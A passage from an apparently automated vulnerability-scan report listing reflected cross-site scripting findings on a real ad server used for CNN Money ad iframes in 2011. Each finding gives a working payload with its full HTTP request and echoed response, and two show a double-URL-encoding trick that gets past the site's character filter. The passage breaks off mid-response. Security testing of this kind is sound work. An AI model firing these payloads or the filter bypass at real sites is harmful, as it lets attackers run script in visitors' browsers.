       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805c7201'-alert(1)-'8f879f37d5f&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.822.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to
...[SNIP]...

1.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b904b'-alert(1)-'70b0bdea029 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169b904b'-alert(1)-'70b0bdea029&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:43:20 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909400:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:43:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169b904b'-alert(1)-'70b0bdea029&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46
...[SNIP]...

1.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60d06'-alert(1)-'3ddd00bf1cc was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158960d06'-alert(1)-'3ddd00bf1cc&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:44:01 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42421:1300909441:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:44:01 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 838

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=158960d06'-alert(1)-'3ddd00bf1cc&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.134.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out mor
...[SNIP]...

1.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 803b7'-alert(1)-'f122ed830e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909169**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D306x25_spon_@26cnn_money_rollup%3Dhomepage_@26cnn_money_section%3Dlast_five_quotes_@26params.styles%3Dfs_@26tile%3D1300909177539_@26page.allowcompete%3Dyes_@26domId%3D80976?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&803b7'-alert(1)-'f122ed830e3=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:45:33 GMT; path=/
Set-Cookie: i_1=25:1538:134:113:0:42422:1300909533:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L; expires=Fri, 22-Apr-2011 19:45:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function wsod_image1538() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=&803b7'-alert(1)-'f122ed830e3=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.134.iframe.306x25/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4976e"-alert(1)-"161b2a8b1d2 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=4832394976e"-alert(1)-"161b2a8b1d2&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=4832394976e"-alert(1)-"161b2a8b1d2&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b32"><script>alert(1)</script>18aa2cb0e34 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239d7b32"><script>alert(1)</script>18aa2cb0e34&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239d7b32"><script>alert(1)</script>18aa2cb0e34&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b33c"-alert(1)-"84acdd203 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514438b33c"-alert(1)-"84acdd203&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2681

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909291**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514438b33c"-alert(1)-"84acdd203&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b018b"><script>alert(1)</script>c9cc5ecaa40 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443b018b"><script>alert(1)</script>c9cc5ecaa40&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443b018b"><script>alert(1)</script>c9cc5ecaa40&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76120%2522%253balert%25281%2529%252f%252f3f80d6e04ca was submitted in the REST URL parameter 2. This input was echoed as 76120";alert(1)//3f80d6e04ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135776120%2522%253balert%25281%2529%252f%252f3f80d6e04ca/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2713

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135776120";alert(1)//3f80d6e04ca/1538.0.iframe.306x25/1300909348**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,30
...[SNIP]...

1.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f4016cb7dd was submitted in the REST URL parameter 2. This input was echoed as 975bb"><script>alert(1)</script>2f4016cb7dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357975bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f4016cb7dd/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
